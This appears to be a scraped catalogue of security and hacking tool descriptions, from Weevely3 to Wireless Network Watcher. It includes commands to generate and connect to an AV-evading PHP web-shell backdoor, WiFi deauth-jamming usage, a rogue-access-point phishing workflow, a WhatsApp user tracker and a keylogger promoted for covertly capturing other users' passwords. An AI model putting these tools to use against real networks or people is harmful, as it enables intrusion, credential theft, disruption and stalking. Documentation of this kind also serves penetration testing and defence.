    Weevely3 - Weaponized Web Shell

    Weevely is a command line web shell dynamically extended over the network at runtime designed for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments.

    The low footprint agent and over 30 modules shape an extensible framework to administrate, conduct a pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper in the internal networks.

    Feature:
    • Shell/PHP telnet-like network terminal
    • Common server misconfigurations auditing
    • SQL console pivoting on target
    • HTTP traffic proxying through target
    • Mount target file system to local mount point
    • Conduct network scans pivoting on target
    • File upload and download
    • Spawn reverse and direct TCP shells
    • Bruteforce services accounts
    • Compress and decompress zip, gzip, bzip2 and tar archives

    The backdoor agent
    The remote agent is a very low footprint php script that receives dynamically injected code from the client, extending the client functionalities over the network at run-time. The agent code is polymorphic and hardly detectable by AV and HIDS. The communication is covered and obfuscated within the HTTP protocol using steganographic techniques.

    Modules development
    Weevely also provides python API which can be used to develop your own module to implement internal audit, account enumerator, sensitive data scraper, network scanner, make the modules work as a HTTP or SQL client and do a whole lot of other cool stuff.

    Installation

    Linux
    The following example runs on a Debian/Ubuntu derived Linux environments with Python version 2.7.
    # Make sure that the python package manager and yaml libraries are installed
    $ sudo apt-get install g++ python-pip libyaml-dev python-dev
    # Install requirements
    $ sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade

    OS X
    The following example runs on OS X with the Macports packaging system.
    $ sudo port install python27 py27-pip
    $ sudo port select --set pip pip27
    $ sudo port select --set python python27
    # Ideally, at this point you should install editline library (http://thrysoee.dk/editline/)
    # to have a working line completion in terminal. See issue #7 for more info.
    $ sudo pip install prettytable Mako PyYAML python-dateutil readline PySocks --upgrade

    Windows
    The following example runs on Microsoft Windows 7 with Python version 2.7, and likely on other Windows version. First of all, install Python 2.7 and pip package manager using ez_setup.py as explained in this guide.
    # Enter in a folder which allows to call pip.exe usually C:\Python27\Scripts\ with no %PATH% set and
    # install the following requirements
    > pip install prettytable Mako PyYAML python-dateutil pyreadline PySocks --upgrade

    Generate the backdoor agent

    Weevely client communicates to the PHP agent installed into the target. Run ./weevely.py to print help.
    $ ./weevely.py 
    [+] weevely 3.0
    [!] Error: too few arguments
    
    [+] Run terminal to the target
        weevely <URL> <password>
    
    [+] Load session file
        weevely session <path>
    
    [+] Generate backdoor agent
        weevely generate <password> <path>
    To generate a new agent, just use the generate option passing the password and path arguments.
    $ ./weevely.py generate mypassword agent.php
    Generated backdoor with password 'mypassword' in 'agent.php' of 1469 byte size.
    Then, upload the generated agent under the target web folder. Make sure that the agent PHP script is properly exposed and executable through the web server.

    Connect to the agent

    Launch weevely script to connect to the remote agent.
     $ ./weevely.py http://target/agent.php mypassword
    weevely> 
    The first prompt weevely> is still not connected to allow users to set any useful pre-connection option e.g. set proxies to be used. Running a real command starts automatically the session on the remote target.
    weevely> ls
    agent.php
    index.html
    joomla-3.2.1
    www-data@target:/var/www $ cd ..
    www-data@target:/var/ $ whoami
    www-data
    www-data@target:/var/ $ uname -a
    Linux ubuntu 3.2.0-65-generic 99-Ubuntu SMP Fri Jul 4 21:04:27 UTC 2014 i686 i686 i386 GNU/Linux
    www-data@target:/var/ $


    Download Weevely3

    Wfuzz - The Web Application Bruteforcer


    Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc.

    Some features
    • Multiple Injection points capability with multiple dictionaries
    • Recursion (When doing directory bruteforce)
    • Post, headers and authentication data brute forcing
    • Output to HTML
    • Colored output
    • Hide results by return code, word numbers, line numbers, regex.
    • Cookies fuzzing
    • Multi threading
    • Proxy support
    • SOCK support
    • Time delays between requests
    • Authentication support (NTLM, Basic)
    • All parameters bruteforcing (POST and GET)
    • Multiple encoders per payload
    • Payload combinations with iterators
    • Baseline request (to filter results against)
    • Brute force HTTP methods
    • Multiple proxy support (each request through a different proxy)
    • HEAD scan (faster for resource discovery)
    • Dictionaries tailored for known applications (Weblogic, Iplanet, Tomcat, Domino, Oracle 9i, Vignette, Coldfusion and many more.i (Many dictionaries are from Darkraver's Dirb, www.open-labs.org)

    Payloads
    • File
    • List
    • hexrand
    • range
    • names
    • hexrange

    Encodings
    • random_uppercase
    • urlencode
    • binary_ascii
    • base64
    • double_nibble_hex
    • uri_hex
    • sha1
    • md5
    • double_urlencode
    • utf8
    • utf8_binary
    • html
    • html decimal
    • custom
    • many more...

    Iterators
    • Product
    • Zip
    • Chain

    Download Wfuzz

    WhatsSpy - Trace the moves of a WhatsApp user


    WhatsSpy Public is an web-oriented application that tracks every move of whoever you like to follow. This application is setup as an Proof of Concept that Whatsapp is broken in terms of privacy. Once you've setup this application you can track users that you want to follow on Whatsapp. Once it's running it keeps track of the following activities:
    • Online/Offline status (even with privacy options set to "nobody")
    • Profile pictures
    • Privacy settings
    • Status messages
    I made this project for you to realise how broken the privacy options actually are. It just started out as experimenting with Whatsapp to build an Bot, but I was stunned when I realised someone could abuse this "online" feauture of Whatsapp to track anyone. I could just say this in like a blog article (like I tried but got marked as spam) that the privacy options are broken, but you wouldnt realise the impact it actually has.

    Requirements

    Shortlist requirements:
    • Secondary Whatsapp account (phonenumber that doesn't use Whatsapp)
    • Rooted Android phone OR Jailbroken iPhone OR PHP knowledge
    • Server/RPi that runs 24/7
    • Nginx or Apache with PHP with PDO (php5-pgsql installed) (you can't host on simple webhoster, you need bash)
    • Postgresql

    Notice

    WhatsSpy Public requires an secondary Whatsapp account. Once the tracker is started, you will not be able to recieve any messages over Whatsapp for this phonenumber. You can either try to register an non-Whatsapp used phonenumber with for example this script or just buy an 5 euro SIM Card and use this phonenumber for the tracker.

    For the tracker to work you need an secret which is retrieved from either your Phone or the register script mentioned above. In case of phone registration you need an jailbroken iPhone or rooted Android device in order to retrieve the secret.
    • Jailbroken iPhone users: You can retrieve using this script.
    • Rooted Android phones can use the following APK to retrieve the secret.
    In order to retrieve the scecret you need to follow these steps:
    • Insert your (new) secondary SIM card in your phone and boot it up.
    • Re-install Whatsapp on your phone and activate it using the new phonenumber.
    • Use either the APK (Android) or the script (iPhone) to retrieve the WhatsApp secret. Write this secret down, which is required later.
    • Insert your normal SIM card and re-install WhatsApp for normal use.


    Download WhatsSpy

    Whonix v11 - Anonymous Operating System


    Whonix is an operating system focused on anonymity, privacy and security. It’s based on the Tor anonymity network, Debian GNU/Linux and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user’s real IP.

    Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible.

    Whonix for Qubes
    https://www.whonix.org/wiki/Qubes

    Whonix for KVM
    https://www.whonix.org/wiki/KVM

    Whonix for VirtualBox
    https://www.whonix.org/wiki/VirtualBox

    If you want to upgrade existing Whonix version using Whonix’s APT repository
    Special instructions required:
    https://www.whonix.org/wiki/Upgrading_Whonix_10_to_Whonix_11

    Changelog between Whonix 10.0.0.5.5 and Whonix 11.0.0.2.3:

    – fixed custom workstation build
    – build script: refactoring, use errtrace rather than many traps – https://phabricator.whonix.org/T48
    – build script: refactoring, use exit trap to reduce code duplication – https://phabricator.whonix.org/T269
    – whonixcheck: warn if whonix-gateway / whonix-workstation package is not installed – https://phabricator.whonix.org/T264
    – whonixcheck: warn if there is low entropy – https://phabricator.whonix.org/T202
    – build, anon-apt-sources-list, anon-shared-build-apt-sources-tpo, whonix-repository: changed release codename from wheezy to jessie – https://phabricator.whonix.org/T270
    – grub-enable-apparmor: Refactoring. Simplified for Debian jessie. Thanks to the new `/etc/default/grub.d` configuration folder, the `grub-enable-apparmor` has been greatly simplified. No longer need to config-package-dev divert `/etc/default/grub`.
    – genmkfile: if debuild not available, recommend installation of the devscripts package
    – build script: added fakeroot to whonix_build_script_build_dependency (required for verifiable builds)
    – genmkfile: if debuild not available, recommend installation of the devscripts package
    – genmkfile: fix, do not set automatically make_use_gain_root_command to true if fakeroot is not installed
    – genmkfile: run dpkg-checkbuilddeps before lintian to show better hint if build dependencies are missing
    – build script: build-steps.d/1200_create-debian-packages: commented out get_extra_packages, no longer need to download packages from testing
    – build script: refactoring, created separate help step, help-steps/git_sanity_test
    – whonixcheck: verbose output for check_tor_socks_port_reachability
    – all packages: packaging, bumped Standards-Version from 3.9.4 to 3.9.6 for jessie support
    – lintian warning copyright fix
    – tb-updater: show “highest version number is not necessarily the best one” message also on first run if no Tor Browser is installed yet – https://phabricator.whonix.org/T283
    – build script: No longer install acpi-support-base by default on jessie, because systemd now implements that functionality. – https://phabricator.whonix.org/T284
    – whonixcheck: added link to Whonix Build Version documentation https://www.whonix.org/wiki/Whonixcheck#Whonix_Build_Version – https://phabricator.whonix.org/T276
    – build script: Fix commit 287bdcf6ddee007ba579e3ee9a1997edc8188581 ‘”makefile: added –pedantic to default DEBUILD_LINTIAN_OPTS because we are going to fix the last remaining “missing upstream changelog” warning’ – added –pedantic help-steps/variables.
    – all packages: added debian/source/lintian-overrides with debian-watch-may-check-gpg-signature to fix lintian warning – https://phabricator.whonix.org/T277
    – whonix-setup-wizard, anon-gw-anonyminizer-config, whonixcheck, whonix-ws-start-menu-additions, whonix-host-firewall: added ‘Keywords=’ to ‘.desktop’ files to fix lintian warning ‘desktop-entry-lacks-keywords-entry’ – https://phabricator.whonix.org/T281
    – anon-shared-helper scripts: replaced dependency ‘python-support (>= 0.90)’ with dh-python to fix lintian warning
    – control-port-filter-python: packaging, use debhelper with python2 to fix lintian warning
    – modify apt-get parameters during build to prevent need to remove apt-listchanges – https://phabricator.whonix.org/T282
    – build-script: refactoring, moved variables DEBIAN_FRONTEND DEBIAN_PRIORITY DEBCONF_NOWARNINGS APT_LISTCHANGES_FRONTEND from help-steps/variables to buildconfig.d/30_apt_opts
    – genmkfile: hint “Is the build dependency genmkfile installed?” if genmkfile is not installed
    – genmkfile: hint ‘dpkg-parsechangelog not found. Do you have the “build-essential” package installed?’ if dpkg-parsechangelog is not available
    – sdwdate: removed dependency on ruby1.9.1-dev to fix lintian warning ‘E: sdwdate: depends-on-obsolete-package depends: ruby1.9.1-dev’
    – whonixcheck: show diagnostic message on whonixcheck Whonix News gpg verification failure by default
    – build script: Fix building Whonix on Whonix, fix if `lsb_release –short –i` returns ‘Whonix’. Temp hack ‘export whonix_build_on_operating_system=”debian”‘ no longer required. Thanks to @nrgaway for the bug report and the analysis. – https://phabricator.whonix.org/T278
    – tb-updater: tbbversion_installed parser fix
    – anon-meta-packages: removed dependency on libupower-glib1 which is no longer available in Debian jessie (which has been replaced by upower, that already gets installed)
    – anon-base-files, whonix-developer-meta-files: implemented WHONIX_BUILD_QUBES=true environment variable support – https://phabricator.whonix.org/T298
    – anon-meta-packages: whonix-gateway and whonix-workstation package no longer depend on anon-shared-build-fix-grub because it has been made a weak dependency for better physical isolation and Qubes support
    – code simplification, removed support for environment variable ANON_BUILD_INSTALL_TO_ROOT=true because anon-shared-build-fix-grub now gets only installed on required platforms
    – implemented build parameter ‘–unsafe-io true’, that speeds up builds, that uses ‘-o Dpkg::Options::=–force-unsafe-io’, eatmydata and ignores ‘sync’. – Thanks to @nrgaway for the suggestion!  – https://phabricator.whonix.org/T295
    – implemented $apt_misc_opts – https://phabricator.whonix.org/T295
    – whonixcheck: new –verbose debug feature, showing output of systemd-detect-virt
    – vbox-disable-timesync: more robust implementation that is compatible with systemd – https://phabricator.whonix.org/T106
    – timesync: compatibility with systemd – https://phabricator.whonix.org/T106
    – whonixcheck, msgdispatcher: ported to systemd – https://phabricator.whonix.org/T106
    – qubes-whonix: skip rads on Qubes – https://phabricator.whonix.org/T306
    – systemd unit files: workaround/fix, removed spaces from ‘WantedBy = ‘, likely bug in ‘deb-systemd-helper’ that prevents enabling the service by default – https://phabricator.whonix.org/T316
    – created a hellodaemon package, useful for Debian systemd packaging debugging – not part of Whonix – https://github.com/adrelanos/hellodaemon
    – whonixcheck: debian/control: fix, added to ‘Build-Depends:’ ‘ruby-ronn (>= 0.7.3)’
    – disable torsocks warning spam – https://phabricator.whonix.org/T317
    – whonix-libvirt: fixed CI builds
    – whonix-libvirt: added driver name=’qemu’ – Thanks to HulaHoop! – https://github.com/Whonix/whonix-libvirt/pull/20 https://github.com/Whonix/whonix-libvirt/pull/19 https://github.com/Whonix/whonix-libvirt/pull/18
    – anon-meta-packages: added obfs4proxy to anon-gateway-packages-recommended – https://phabricator.whonix.org/T323
    – anon-meta-packages: added apt-transport-tor to anon-shared-packages-recommended – https://phabricator.whonix.org/T92
    – whonix-gw-network-conf, whonix-ws-network-conf: Removed ‘pre-up /usr/bin/whonix_firewall’, because /etc/network/if-pre-up.d to load the firewall, because of a Debian upstream bug interface comes up even if a script in /etc/network/if-pre-up.d/ fails http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=700811 was fixed. – https://phabricator.whonix.org/T68
    whonix-gw-firewall, whonix-ws-firewall, whonix-host-firewall: Made package more standalone. Requiring ‘pre-up /usr/bin/whonix_firewall’ in /etc/network/interfaces is no longer necessary. Added etc/network/if-pre-up.d/30_whonix_firewall to load the firewall, because of a Debian upstream bug ‘interface comes up even if a script in /etc/network/if-pre-up.d/ fails’ http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=700811 was fixed. – https://phabricator.whonix.org/T68
    – whonixsetup, whonix-setup-wizard: fix ‘Tor fails after reload related to torrc DisableNetwork setting issue’ by only restarting Tor, no longer trying to reload Tor – https://phabricator.whonix.org/T320
    – rads: Improved implementation. When there is enough RAM… On ‘enter’: instantly start login manager. On ‘ctrl + c’: instantly abort and do not start login manager. On ‘timeout’: start login manager. Thanks to ‘dh_systemd_start –no-start’ we can now use ‘StandardInput=tty’ and ‘read’ instead of ‘systemd-ask-password’. Now we could even implement an interactive menu at boot (that allows to configure wait time and/or disabling rads). – https://phabricator.whonix.org/T57
    – whonixcheck: abolished random wait by default – https://phabricator.whonix.org/T299
    – anon-ws-disable-stacked-tor: fixed ‘insserv: script tor.anondist-orig: service tor already provided!’ warning during upgrades – https://phabricator.whonix.org/T303
    – anon-ws-disable-stacked-tor: systemd compatibility – https://phabricator.whonix.org/T303
    – anon-base-files: no longer ‘set -o pipefail’ in /usr/lib/pre.bsh. config-package-dev doesn’t like ‘set -o pipefail’ – http://mailman.mit.edu/pipermail/config-package-dev/2015-May/000041.html – https://phabricator.whonix.org/T329
    – upstream bug report: spaces in Tor’s systemd unit file causes issues – https://trac.torproject.org/projects/tor/ticket/16162
    – upstream bug report: Tor dies on reload when swichting to ‘DisableNetwork 0’ when using ‘DnsPort 127.0.0.1:53’ – https://trac.torproject.org/projects/tor/ticket/16161
    build script: fix, support ‘–verifiable false’ (was ‘–verifiable minimal’ while build documentation said ‘false’)
    – uwt: multi user fix – https://www.whonix.org/forum/index.php/topic,1267
    – Qubes: WiFi Realtek RTL8191SEvB Issue and Solution – https://groups.google.com/forum/#!topic/qubes-users/kMGTSwP72aU
    – whonix-setup-wizard API proposal: https://www.whonix.org/wiki/Dev/whonixsetup


    Download Whonix v11

    WifiInfoView v1.79 - WiFi Scanner for Windows 7/8/Vista


    WifiInfoView scans the wireless networks in your area and displays extensive information about them, including: Network Name (SSID), MAC Address, PHY Type (802.11g or 802.11n), RSSI, Signal Quality, Frequency, Channel Number, Maximum Speed, Company Name, Router Model and Router Name (Only for routers that provides this information), and more...

    When you select a wireless network in the upper pane of this tool, the lower pane displays the Wi-Fi information elements received from this device, in hexadecimal format.

    WifiInfoView also has a summary mode, which displays a summary of all detected wireless networks, grouped by channel number, company that manufactured the router, PHY type, or the maximum speed.

    Columns In the Upper Pane
    • SSID: The name of the network.
    • MAC Address: MAC address of the router.
    • PHY Type: The PHY type for this network - 802.11a, 802.11g, 802.11n, or High-Rate DSSS
    • RSSI: The received signal strength indicator value, in units of decibels referenced to 1.0 milliwatts (dBm), as detected by the wireless LAN interface driver for the AP or peer station.
    • Signal Quality: A number between 0 and 100 that represents the quality of the signal.
    • Frequency: The channel center frequency of the band on which the 802.11 Beacon or Probe Response frame was received. The value of this column is in units of Gigahertz (GHz).
    • Channel: Channel number used by this wireless network.
    • Information Size:The total size (in bytes) of all Wi-Fi information elements received from this wireless network.
    • Elements Count: The total number of Wi-Fi information elements received from this wireless network.
    • Company: The company that manufactured the router, according to the 3 first bytes of the MAC address.
    • Router Model: The model of the router. This value is displayed only for routers that provide this information inside the Wi-Fi information elements.
    • Router Name: The name of the router. This value is displayed only for routers that provide this information inside the Wi-Fi information elements.
    • Security: Specifies whether the network is secured (Yes/No).
    • Maximum Speed: The maximum speed (in Mbps) that you can get when connecting to this wireless network.
    • First Detection: The first date/time that this network was detected.
    • Last Detection: The last date/time that this network was detected.
    • Detection Count: The number of times that this network was detected.  

    Command-Line Options

    /cfg <Filename> Start WifiInfoView with the specified configuration file. For example:
    WifiInfoView.exe /cfg "c:\config\csv.cfg"
    WifiInfoView.exe /cfg "%AppData%\WifiInfoView.cfg"
    /NumberOfScans <Number> Specifies the number of scans to perform when using the save command-line options (/scomma, /shtml, and so on...)
    /stext <Filename> Save the list of wireless networks into a regular text file.
    /stab <Filename> Save the list of wireless networks into a tab-delimited text file.
    /scomma <Filename> Save the list of wireless networks into a comma-delimited text file (csv).
    /stabular <Filename> Save the list of wireless networks into a tabular text file.
    /shtml <Filename> Save the list of wireless networks into HTML file (Horizontal).
    /sverhtml <Filename> Save the list of wireless networks into HTML file (Vertical).
    /sxml <Filename> Save the list of wireless networks into XML file.
    /sort <column> This command-line option can be used with other save options for sorting by the desired column. If you don't specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like "SSID" and "RSSI". You can specify the '~' prefix character (e.g: "~SSID") if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns. Examples:
    WifiInfoView.exe /shtml "d:\temp\wifi.html" /sort 2 /sort ~1
    WifiInfoView.exe /scomma "d:\temp\wifi.html" /sort "~Security" /sort "SSID"
    /nosort When you specify this command-line option, the list will be saved without any sorting.
    /UseOnlyAdapter <0 | 1> Specifies whether to use only the desired network adapter. 0 = No, 1 = Yes.
    /NetworkAdapter <Adapter Guid> Specifies the guid of the network adapter to use, for example:
    WifiInfoView.exe /UseOnlyAdapter 1 /NetworkAdapter "{F261051F-D217-12D0-B9A9-F61D323AD21E}"
    /SortOnEveryUpdate <0 | 1> Specifies whether to sort on every update. 0 = No, 1 = Yes.
    /MacAddressFormat <1 - 3> Specifies the MAC address format. 1 = XX-XX-XX-XX-XX-XX, 2 = XX:XX:XX:XX:XX:XX, 3 = XXXXXXXXXXXX.
    /DisplayMode <1 - 11> Specifies the display mode:
    1 - Full Details Mode
    2 - Channels Summary Mode
    3 - Companies Summary Mode
    4 - PHY Types Summary Mode
    5 - Max Speed Summary Mode
    6 - Router Model Summary Mode
    7 - Router Name Summary Mode
    8 - Signal Quality Summary Mode
    9 - BSS Type Summary Mode
    10 - Security Summary Mode
    11 - WPS Summary Mode
    /UpdateRate <1 - 4> Specifies the update rate: 1- Low, 2 - Medium, 3 - High, 4 - Very High.


    Download WifiInfoView v1.79

    WiFiJammer - Continuously Jam All WiFi Clients/Routers


    Continuously jam all wifi clients and access points within range. The effectiveness of this script is constrained by your wireless card. Alfa cards seem to effectively jam within about a block radius with heavy access point saturation. Granularity is given in the options for more effective targeting.

    Requires: python 2.7, python-scapy, a wireless card capable of injection

    Usage

    Simple
    python wifijammer.py
    This will find the most powerful wireless interface and turn on monitor mode. If a monitor mode interface is already up it will use the first one it finds instead. It will then start sequentially hopping channels 1 per second from channel 1 to 11 identifying all access points and clients connected to those access points. On the first pass through all the wireless channels it is only identifying targets. After that the 1sec per channel time limit is eliminated and channels are hopped as soon as the deauth packets finish sending. Note that it will still add clients and APs as it finds them after the first pass through.

    Upon hopping to a new channel it will identify targets that are on that channel and send 1 deauth packet to the client from the AP, 1 deauth to the AP from the client, and 1 deauth to the AP destined for the broadcast address to deauth all clients connected to the AP. Many APs ignore deauths to broadcast addresses.
    python wifijammer.py -a 00:0E:DA:DE:24:8E -c 2
    Deauthenticate all devices with which 00:0E:DA:DE:24:8E communicates and skips channel hopping by setting the channel to the target AP's channel (2 in this case). This would mainly be an access point's MAC so all clients associated with that AP would be deauthenticated, but you can also put a client MAC here to target that one client and any other devices that communicate with it.

    Advanced
    python wifijammer.py -c 1 -p 5 -t .00001 -s DL:3D:8D:JJ:39:52 -d --world
    -c, Set the monitor mode interface to only listen and deauth clients or APs on channel 1
    -p, Send 5 packets to the client from the AP and 5 packets to the AP from the client along with 5 packets to the broadcast address of the AP
    -t, Set a time interval of .00001 seconds between sending each deauth (try this if you get a scapy error like 'no buffer space')
    -s, Do not deauth the MAC DL:3D:8D:JJ:39:52. Ignoring a certain MAC address is handy in case you want to tempt people to join your access point in cases of wanting to use LANs.py or a Pineapple on them.
    -d, Do not send deauths to access points' broadcast address; this will speed up the deauths to the clients that are found
    --world, Set the max channel to 13. In N. America the max channel standard is 11, but the rest of the world uses 13 channels so use this option if you're not in N. America

    Walking/driving around
    python wifijammer.py -m 10
    The -m option sets a max number of client/AP combos that the script will attempt to deauth. When the max number is reached, it clears and repopulates its list based on what traffic it sniffs in the area. This allows you to constantly update the deauth list with client/AP combos who have the strongest signal in case you were not stationary. If you want to set a max and not have the deauth list clear itself when the max is hit, just add the -n option like: -m 10 -n

    All options:
    python wifijammer.py [-a AP MAC] [-c CHANNEL] [-d] [-i INTERFACE] [-m MAXIMUM] [-n] [-p PACKETS] [-s SKIP] [-t TIME INTERVAL]


    Download WiFiJammer

    WiFiPhisher - Fast automated phishing attacks against WiFi networks


    Wifiphisher is a security tool that mounts fast automated phishing attacks against WiFi networks in order to obtain secret passphrases and other credentials. It is a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third party login pages or WPA/WPA2 secret passphrases.

    Wifiphisher works on Kali Linux and is licensed under the MIT license.

    From the victim's perspective, the attack makes use in three phases:
    1. Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.
    2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.
    3. Victim is being served a realistic router config-looking page. wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials, for example one that asks WPA password confirmation due to a router firmware upgrade.

    Usage
    Short form Long form Explanation
    -m maximum Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5
    -n noupdate Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n
    -t timeinterval Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001
    -p packets Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2
    -d directedonly Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs
    -a accesspoint Enter the MAC address of a specific access point to target
    -jI jamminginterface Choose the interface for jamming. By default script will find the most powerful interface and starts monitor mode on it.
    -aI apinterface Choose the interface for the fake AP. By default script will find the second most powerful interface and starts monitor mode on it.

    Screenshots

    Targeting an access point

    A successful attack

    Fake router configuration page


    Requirements
    • Kali Linux.
    • Two wireless network interfaces, one capable of injection.

    Download WiFiPhisher

    Wifresti - Find your wireless network password from Windows, Linux and Mac OS


    Find your wireless network password from Windows , Linux and Mac OS.

    Wifresti is a simple Wi-Fi password recovery tool , compatible with Windows , and Unix systems (Linux , Mac OS).

    Features
    • Recover Wifi password on Windows
    • Recover Wifi password on Unix

    Requirements
    • An operating system (tested on Ubuntu, Windows 10,8,7)
    • Python 2.7

    Instalation
    sudo su
    git clone https://github.com/LionSec/wifresti.git && cp wifresti/wifresti.py /usr/bin/wifresti && chmod +x /usr/bin/wifresti
    sudo wifresti


    Download Wifresti

    wig - WebApp Information Gatherer


    wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications.
    The application fingerprinting is based on checksums and string matching of known files for different versions of CMSes. This results in a score being calculated for each detected CMS and its versions. Each detected CMS is displayed along with the most probable version(s) of it. The score calculation is based on weights and the amount of "hits" for a given checksum.
    wig also tries to guess the operating system on the server based on the 'server' and 'x-powered-by' headers. A database containing known header values for different operating systems is included in wig, which allows wig to guess Microsoft Windows versions and Linux distribution and version.

    wig features:
    • CMS version detection by: check sums, string matching and extraction
    • Lists detected package and platform versions such as asp.net, php, openssl, apache
    • Detects JavaScript libraries
    • Operation system fingerprinting by matching php, apache and other packages against a values in wig's database
    • Checks for files of interest such as administrative login pages, readmes, etc
    • Currently the wig's databases include 28,000 fingerprints
    • Reuse information from previous runs (save the cache)
    • Implement a verbose option
    • Remove dependency on 'requests'
    • Support for proxy
    • Proper threading support
    • Included check for known vulnerabilities

    Requirements

    wig is built with Python 3, and is therefore not compatible with Python 2.

    How it works

    The default behavior of wig is to identify a CMS, and exit after version detection of the CMS. This is done to limit the amount of traffic sent to the target server. This behavior can be overwritten by setting the '-a' flag, in which case wig will test all the known fingerprints. As some configurations of applications do not use the default location for files and resources, it is possible to have wig fetch all the static resources it encounters during its scan. This is done with the '-c' option. The '-m' option tests all fingerprints against all fetched URLs, which is helpful if the default location has been changed.

    Help Screen
    usage: wig.py [-h] [-l INPUT_FILE] [-n STOP_AFTER] [-a] [-m] [-u]
                  [--no_cache_load] [--no_cache_save] [-N] [--verbosity]
                  [--proxy PROXY] [-w OUTPUT_FILE]
                  [url]
    
    WebApp Information Gatherer
    
    positional arguments:
      url              The url to scan e.g. http://example.com
    
    optional arguments:
      -h, --help       show this help message and exit
      -l INPUT_FILE    File with urls, one per line.
      -n STOP_AFTER    Stop after this amount of CMSs have been detected. Default:
                       1
      -a               Do not stop after the first CMS is detected
      -m               Try harder to find a match without making more requests
      -u               User-agent to use in the requests
      --no_cache_load  Do not load cached responses
      --no_cache_save  Do not save the cache for later use
      -N               Shortcut for --no_cache_load and --no_cache_save
      --verbosity, -v  Increase verbosity. Use multiple times for more info
      --proxy PROXY    Tunnel through a proxy (format: localhost:8080)
      -w OUTPUT_FILE   File to dump results into (JSON)
    

    Example of run:
    $ ./wig.py example.com
    
    dP   dP   dP    dP     .88888.
    88   88   88    88    d8'   `88
    88  .8P  .8P    88    88
    88  d8'  d8'    88    88   YP88
    88.d8P8.d8P     88    Y8.   .88
    8888' Y88'      dP     `88888'
    
      WebApp Information Gatherer
    
    Redirected to http://www.example.com. Continue? [Y|n]:
    
    TITLE
    --- HTML TITLE ---
    
    IP
    255.255.255.256
    
    
    
    SOFTWARE                  VERSION                           CATEGORY
    Drupal                    7.28 | 7.29 | 7.30 | 7.31 | 7.32  CMS
    ASP.NET                   4.0.30319.18067                   Platform
    Microsoft-HTTPAPI         2.0                               Platform
    Microsoft-IIS             6.0 | 7.0 | 7.5 | 8.0             Platform
    Microsoft Windows Server  2003 SP2 | 2008 | 2008 R2 | 2012  Operating System
    
    SOFTWARE                  VULNERABILITIES                   LINK
    Drupal 7.28               7                                 http://cvedetails.com/version/169265
    Drupal 7.29               3                                 http://cvedetails.com/version/169917
    Drupal 7.30               3                                 http://cvedetails.com/version/169916
    
    URL                       NOTE                              CATEGORY
    /login/                   Test directory                    Interesting URL
    /login/index_form.html    ASP.NET detailed error            Interesting URL
    /robots.txt               robots.txt index                  Interesting URL
    /test/                    Test directory                    Interesting URL
    _______________________________________________________________________________
    Time: 15.7 sec            Urls: 351                         Fingerprints: 28989
    


    Download wig

    Windows Spy Keylogger - Software to Log Keystrokes in Stealth Mode for 32-bit/64-bit processes on Windows XP/Vista/7/8/10


    Windows Spy Keylogger is the free software to help you covertly monitor all activities on your computer.

    It intercepts everything that is typed on keyboard and stores into one log file which you can view it anytime later. You can track logins, passwords, emails, chats and all other secret things typed by the user.

    You can also customize various options including stealth mode, run at startup, logfile etc. It is very simple to use with just a click of button.

    One of the unique feature of this tool is that you can install it and run it on any computer without administrator permissions. Also it works on both 32-bit & 64-bit Windows platforms seamlessly.

    It is suitable for parents who want to monitor activities of their children. Also cyber crime investigators, penetration testers, forensic analysts will find it very handy in their work.

    Windows Spy Keylogger works on all platforms starting from Windows XP to new Windows 10 version.

    Features
    • Free Tool to Monitor Keystokes in stealth manner
    • Monitor both 32-bit & 64-bit applications
    • Automatically run at Startup
    • No need for administrator privileges
    • Settings dialog to change various options
    • Stores keyboard activities silently to a log file
    • Very easy to use with just a click of button
    • Displays current status of key logger at any time
    • Includes Installer for local installation & un-installation
    How to Use?

    'Windows Spy Keylogger' is very easy to use tool with its cool GUI interface.
    Here are the simple steps,
    • Run 'Windows Spy Keylogger' on your system
    • It will show you the current status of Keylogger as seen in the screenshots below.
    • Now you can just click on button below to Start or Stop Keylogger
    • That's all :)
    Also you can customize various options (run at startup, log path, version check etc) using the 'Settings Dialog' by click on the button at bottom right corner.


    Download Windows Spy Keylogger

    Wireless Network Watcher v1.79 - Show who is connected to your wireless network


    Wireless Network Watcher is a small utility that scans your wireless network and displays the list of all computers and devices that are currently connected to your network. 
    For every computer or device that is connected to your network, the following information is displayed: IP address, MAC address, the company that manufactured the network card, and optionally the computer name. 
    You can also export the connected devices list into html/xml/csv/text file, or copy the list to the clipboard and then paste into Excel or other spreadsheet application.

    Using Wireless Network Watcher

